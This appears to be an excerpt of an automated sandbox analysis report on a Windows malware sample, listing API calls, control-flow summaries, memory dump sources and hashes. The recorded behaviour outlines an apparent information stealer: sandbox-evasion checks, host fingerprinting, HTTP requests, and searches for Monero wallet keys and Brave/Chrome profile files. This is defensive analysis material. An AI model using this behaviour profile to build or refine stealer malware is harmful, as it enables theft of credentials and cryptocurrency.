                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                • Sleep.KERNEL32(00001770), ref: 00C46B04
                                • CloseHandle.KERNEL32(?,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                • ExitProcess.KERNEL32 ref: 00C46B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                • String ID:
                                • API String ID: 2525456742-0
                                • Opcode ID: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                • Instruction ID: 67eedbd294ded08dfa2f935ab88f88d1ca792c4d6e80b52b3e6855ae854e104b
                                • Opcode Fuzzy Hash: aac8c02853ebc8a9d5df6a0ff44d94b94af17a6f516778a63bd82e9f7b9ee537
                                • Instruction Fuzzy Hash: C4312870950208ABEB04FBF1DC56BEE7778BF54301F144528F612A21C2DF706A45EAA6

                                Control-flow Graph

                                control_flow_graph 1204 c31220-c31247 call c489b0 GlobalMemoryStatusEx 1207 c31273-c3127a 1204->1207 1208 c31249-c31271 call c4da00 * 2 1204->1208 1210 c31281-c31285 1207->1210 1208->1210 1212 c31287 1210->1212 1213 c3129a-c3129d 1210->1213 1215 c31292-c31294 ExitProcess 1212->1215 1216 c31289-c31290 1212->1216 1216->1213 1216->1215
                                APIs
                                • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 00C3123E
                                • __aulldiv.LIBCMT ref: 00C31258
                                • __aulldiv.LIBCMT ref: 00C31266
                                • ExitProcess.KERNEL32 ref: 00C31294
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                • String ID: @
                                • API String ID: 3404098578-2766056989
                                • Opcode ID: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                • Instruction ID: 827dfd3257df782781c07b994c4be162951b7d82001af821b1c773ef57daae02
                                • Opcode Fuzzy Hash: d919b37c2cdf3ea38c15efb8b69d078ac3c29b461efd1989c3fbaa1d1830c5d8
                                • Instruction Fuzzy Hash: 3C016DB0D50308BEEB10EFE0DC49B9EBB78BB54705F288058EB05B62C0D77556459B99

                                Control-flow Graph

                                control_flow_graph 1218 c46af3 1219 c46b0a 1218->1219 1221 c46b0c-c46b22 call c46920 call c45b10 CloseHandle ExitProcess 1219->1221 1222 c46aba-c46ad7 call c4aad0 OpenEventA 1219->1222 1228 c46af5-c46b04 CloseHandle Sleep 1222->1228 1229 c46ad9-c46af1 call c4aad0 CreateEventA 1222->1229 1228->1219 1229->1221
                                APIs
                                • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46ACA
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C46AE8
                                • CloseHandle.KERNEL32(00000000), ref: 00C46AF9
                                • Sleep.KERNEL32(00001770), ref: 00C46B04
                                • CloseHandle.KERNEL32(?,00000000,?,019F8C78,?,00C5110C,?,00000000,?,00C51110,?,00000000,00C50AEF), ref: 00C46B1A
                                • ExitProcess.KERNEL32 ref: 00C46B22
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                • String ID:
                                • API String ID: 941982115-0
                                • Opcode ID: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                • Instruction ID: c17c8fc7fd6d950a1b9e7ee261f4348e56015d41bcc0d20ee3862ea7cc09cdf6
                                • Opcode Fuzzy Hash: 4949f813d2fe20f6099ffc16aea377a723c3ce32d236ec39437ed7c02a325574
                                • Instruction Fuzzy Hash: 31F05E70940219AFE700EBA1DC0ABBD7B74FB05701F144925F516B11C5CBB05584FA6B

                                Control-flow Graph

                                APIs
                                • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00C34839
                                • InternetCrackUrlA.WININET(00000000,00000000), ref: 00C34849
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: CrackInternetlstrlen
                                • String ID: <
                                • API String ID: 1274457161-4251816714
                                • Opcode ID: 3098be050c841d28093467b13a00b2eeea855a76ecbedf8d026338b114b3c154
                                • Instruction ID: 17db261e9ce45459dd5b0763f92f994718f1e4c95317c525eb2a183882abb4a2
                                • Opcode Fuzzy Hash: 3098be050c841d28093467b13a00b2eeea855a76ecbedf8d026338b114b3c154
                                • Instruction Fuzzy Hash: FD2162B1D00208ABDF14DFA4ED4AADD7B75FB44310F108625F915A72C0DB706609DF81

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00C4A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00C4A7E6
                                  • Part of subcall function 00C36280: InternetOpenA.WININET(00C50DFE,00000001,00000000,00000000,00000000), ref: 00C362E1
                                  • Part of subcall function 00C36280: StrCmpCA.SHLWAPI(?,019FF380), ref: 00C36303
                                  • Part of subcall function 00C36280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00C36335
                                  • Part of subcall function 00C36280: HttpOpenRequestA.WININET(00000000,GET,?,019FECB8,00000000,00000000,00400100,00000000), ref: 00C36385
                                  • Part of subcall function 00C36280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00C363BF
                                  • Part of subcall function 00C36280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C363D1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00C45228
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                • String ID: ERROR$ERROR
                                • API String ID: 3287882509-2579291623
                                • Opcode ID: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                • Instruction ID: 9b9cc00b9739a899c52114db704eba6f94c09435564f422ca5af65f8b32b8d86
                                • Opcode Fuzzy Hash: e3871d914ac265c38273077ce9b3f5311ac331bcac5465da67ad4de592312fb5
                                • Instruction Fuzzy Hash: 27113030950108ABEB14FF61DD52AED7738BF50300F404168FC1A5B193EF30AB09EA92
                                APIs
                                • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00C3112B
                                • VirtualAllocExNuma.KERNEL32(00000000), ref: 00C31132
                                • ExitProcess.KERNEL32 ref: 00C31143
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$AllocCurrentExitNumaVirtual
                                • String ID:
                                • API String ID: 1103761159-0
                                • Opcode ID: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                • Instruction ID: 4f885f13fd2e57bff0f6a39fe4e3988c18fe059a154631ea9fa5b531d114a31c
                                • Opcode Fuzzy Hash: 77dfba2fc83e2540d812facb73b46544bddda024934cbb0b698240a46fdb5928
                                • Instruction Fuzzy Hash: 87E08670955308FFE714EBA19C0EB0C76B8AB44B02F140055F70D761C0C6B42644969A
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 00C310B3
                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 00C310F7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Virtual$AllocFree
                                • String ID:
                                • API String ID: 2087232378-0
                                • Opcode ID: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                • Instruction ID: 2f1178416b60e9c5da4d8fc8a2b4b5fc8350a0c48373e1057cd390b14c69acee
                                • Opcode Fuzzy Hash: 94501f90c781e642ef4c93cd4a87f593a7918701cbb56573855b921afbba730a
                                • Instruction Fuzzy Hash: A8F0E2B1641208BFE718EAA4AC49FAEB7E8E705B15F300458F904E7280D5719F44DAA1
                                APIs
                                  • Part of subcall function 00C478E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00C47910
                                  • Part of subcall function 00C478E0: RtlAllocateHeap.NTDLL(00000000), ref: 00C47917
                                  • Part of subcall function 00C478E0: GetComputerNameA.KERNEL32(?,00000104), ref: 00C4792F
                                  • Part of subcall function 00C47850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00C311B7), ref: 00C47880
                                  • Part of subcall function 00C47850: RtlAllocateHeap.NTDLL(00000000), ref: 00C47887
                                  • Part of subcall function 00C47850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00C4789F
                                • ExitProcess.KERNEL32 ref: 00C311C6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                • Instruction ID: a4234cc96322c9c090caef9ec00301c7ae563ff523879008550502907ddae38b
                                • Opcode Fuzzy Hash: f35501b9a6c8bfea535999b7c7bcb1a9bdfdb8afe4d3e9f58bfc0384a98e249b
                                • Instruction Fuzzy Hash: D0E012B59143015BCA00B7B1AC0AB2E329CAB5474AF0C0939FA09F2142FB65E949A666
                                APIs
                                • wsprintfA.USER32 ref: 00C438CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C438E3
                                • lstrcat.KERNEL32(?,?), ref: 00C43935
                                • StrCmpCA.SHLWAPI(?,00C50F70), ref: 00C43947
                                • StrCmpCA.SHLWAPI(?,00C50F74), ref: 00C4395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C43C67
                                • FindClose.KERNEL32(000000FF), ref: 00C43C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                • Instruction ID: 404778ecc219565c922bda3c78bf3bdf61b20afa5c36fb8d50f95d3ddbbbe026
                                • Opcode Fuzzy Hash: a4b1625531b62538ad78a6576645faaa9633fd83d5fe6fb6648dc9e2e2d38a0e
                                • Instruction Fuzzy Hash: 04A142B1A002189FDB24EFA5DC85FEE7378FB94301F084598E51DA6141EB759B88CF62
                                APIs
                                  • Part of subcall function 00C4A740: lstrcpy.KERNEL32(00C50E17,00000000), ref: 00C4A788
                                  • Part of subcall function 00C4A920: lstrcpy.KERNEL32(00000000,?), ref: 00C4A972
                                  • Part of subcall function 00C4A920: lstrcat.KERNEL32(00000000), ref: 00C4A982
                                  • Part of subcall function 00C4A9B0: lstrlen.KERNEL32(?,019F8A88,?,\Monero\wallet.keys,00C50E17), ref: 00C4A9C5
                                  • Part of subcall function 00C4A9B0: lstrcpy.KERNEL32(00000000), ref: 00C4AA04
                                  • Part of subcall function 00C4A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00C4AA12
                                  • Part of subcall function 00C4A8A0: lstrcpy.KERNEL32(?,00C50E17), ref: 00C4A905
                                • FindFirstFileA.KERNEL32(00000000,?,00C50B32,00C50B2B,00000000,?,?,?,00C513F4,00C50B2A), ref: 00C3BEF5
                                • StrCmpCA.SHLWAPI(?,00C513F8), ref: 00C3BF4D
                                • StrCmpCA.SHLWAPI(?,00C513FC), ref: 00C3BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C3C7BF
                                • FindClose.KERNEL32(000000FF), ref: 00C3C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                • Instruction ID: 8d1f464f53db852cc4946b21991c02bdfbcb554744b4cd2db0ac491c5a4dfc3c
                                • Opcode Fuzzy Hash: 251edb2f9d12c73bd8577ee3b995e580b9dea81eb5e0a1cb95bc9af32c0ca966
                                • Instruction Fuzzy Hash: 3A426372950104ABEB14FB70DD96EED737DBF94300F404568F90AA6091EF34AB49DBA2
                                APIs
                                • wsprintfA.USER32 ref: 00C4492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                • StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                • StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                • FindClose.KERNEL32(000000FF), ref: 00C44B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1310468035.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                 • Associated: 00000000.00000002.1310379765.0000000000C30000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CE1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000CED000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000D12000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310468035.0000000000E7A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000000E8E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001014000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.00000000010EE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001110000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001117000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1310601504.0000000001126000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311295036.0000000001127000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1311460333.00000000012BB000.00000040.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                Yara matches
